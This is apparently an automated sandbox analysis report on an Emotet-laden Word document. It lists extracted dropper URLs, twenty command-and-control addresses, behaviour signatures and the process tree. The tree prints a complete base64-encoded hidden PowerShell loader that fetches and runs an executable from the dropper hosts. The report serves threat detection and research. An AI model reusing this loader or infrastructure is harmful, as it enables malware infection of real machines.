Analysis

  • max time kernel
    29s
  • resource
    win10v191014
  • submitted
    17-01-2020 12:24

General

  • Target

    fb4eb20a88f40b3879d636e628d900f8cc7725d7029eb535b7144117fe9a079c

  • Sample

    200117-8hq6adymtn

  • SHA256

    fb4eb20a88f40b3879d636e628d900f8cc7725d7029eb535b7144117fe9a079c

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://friendzonecafe.com/cgi-bin/JNjiKG/

exe.dropper

http://www.jalanuang.com/wp-content/wfwwwTbw/

exe.dropper

http://erfanpich.com/wp-includes/iCWesb/

exe.dropper

https://myevol.biz/office365/JypsIM/

exe.dropper

http://aminanchondo.com/wp-admin/qdedi66f4-ts7-841192/

Extracted

Family

emotet

C2

177.103.240.93:80

197.94.32.129:8080

58.92.179.55:443

124.150.175.133:80

143.95.101.72:8080

91.205.173.150:8080

69.30.205.162:7080

125.209.114.180:443

78.210.132.35:80

112.186.195.176:80

183.87.40.21:8080

91.83.93.103:443

66.229.161.86:443

114.179.127.48:80

41.77.74.214:443

122.19.63.27:80

50.116.78.109:8080

200.82.88.254:80

42.51.192.231:8080

160.119.153.20:80

rsa_pubkey.plain

Signatures

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fb4eb20a88f40b3879d636e628d900f8cc7725d7029eb535b7144117fe9a079c.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Enumerates system info in registry
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4956
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABZAG0AdgB3AGgAbQB0AHYAZwBrAD0AJwBCAGwAagByAGMAeQBtAHIAYwBsAGoAJwA7ACQATgBmAG0AdQBmAHYAYwBtAGgAYgBrAHEAcQAgAD0AIAAnADkANwA4ACcAOwAkAEIAZABiAHAAagBoAHAAagBpAD0AJwBOAGIAbQB1AGoAZwBrAGkAJwA7ACQAQwB6AHoAeABpAHMAaAB5AHgAagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBmAG0AdQBmAHYAYwBtAGgAYgBrAHEAcQArACcALgBlAHgAZQAnADsAJABCAHkAawBoAHIAZABjAGcAPQAnAFYAdABjAGsAcQB1AHEAYQAnADsAJABBAHQAeABmAG8AcQB3AHkAYgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAQgBjAEwAaQBlAG4AdAA7ACQAWABxAGEAdQBvAGIAZQB5AGcAawB1AHkAPQAnAGgAdAB0AHAAOgAvAC8AZgByAGkAZQBuAGQAegBvAG4AZQBjAGEAZgBlAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ASgBOAGoAaQBLAEcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBqAGEAbABhAG4AdQBhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHcAZgB3AHcAdwBUAGIAdwAvACoAaAB0AHQAcAA6AC8ALwBlAHIAZgBhAG4AcABpAGMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaQBDAFcAZQBzAGIALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHkAZQB2AG8AbAAuAGIAaQB6AC8AbwBmAGYAaQBjAGUAMwA2ADUALwBKAHkAcABzAEkATQAvACoAaAB0AHQAcAA6AC8ALwBhAG0AaQBuAGEAbgBjAGgAbwBuAGQAbwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcQBkAGUAZABpADYANgBmADQALQB0AHMANwAtADgANAAxADEAOQAyAC8AJwAuACIAUwBgAFAAbABpAHQAIgAoACcAKgAnACkAOwAkAFMAZAB3AHAAcAB4AHoAeAA9ACcAWgBxAHgAZABhAGYAcgBpAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEgAbwBtAGgAbABmAGkAeQBlAGYAeABoACAAaQBuACAAJABYAHEAYQB1AG8AYgBlAHkAZwBrAHUAeQApAHsAdAByAHkAewAkAEEAdAB4AGYAbwBxAHcAeQBiAC4AIgBkAG8AVwBuAGwATwBgAEEAZABGAGAASQBgAGwARQAiACgAJABIAG8AbQBoAGwAZgBpAHkAZQBmAHgAaAAsACAAJABDAHoAegB4AGkAcwBoAHkAeABqACkAOwAkAEMAdQBqAGcAdAB6AGMAZABvAHAAagA9ACcASAB5AGIAdQBzAHUAZABlAG0AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDAHoAegB4AGkAcwBoAHkAeABqACkALgAiAEwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgA2ADIAMQA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgBUACIAKAAkAEMAegB6AHgAaQBzAGgAeQB4AGoAKQA7ACQAVwB5AGsAbABkAGkAaQBsAG4APQAnAE0AagB2AHgAeAB0AGUAcQBwACcAOwBiAHIAZQBhAGsAOwAkAFYAYgBkAHcAcAB5AGEAaQBwAG0AZwBhAD0AJwBSAHMAbABnAGIAaABxAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATAB3AHcAZgBrAGkAcwBuAGgAZABjAD0AJwBIAHQAagBsAGYAYQB2AGYAaQAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:3684
    • C:\Users\Admin\978.exe
      "C:\Users\Admin\978.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4752
      • C:\Users\Admin\978.exe
        --5a8252d8
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4732

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\978.exe

  • C:\Users\Admin\978.exe

  • C:\Users\Admin\978.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/4732-10-0x0000000000480000-0x0000000000497000-memory.dmp

    Filesize

    92KB

  • memory/4732-11-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/4752-7-0x0000000002550000-0x0000000002567000-memory.dmp

    Filesize

    92KB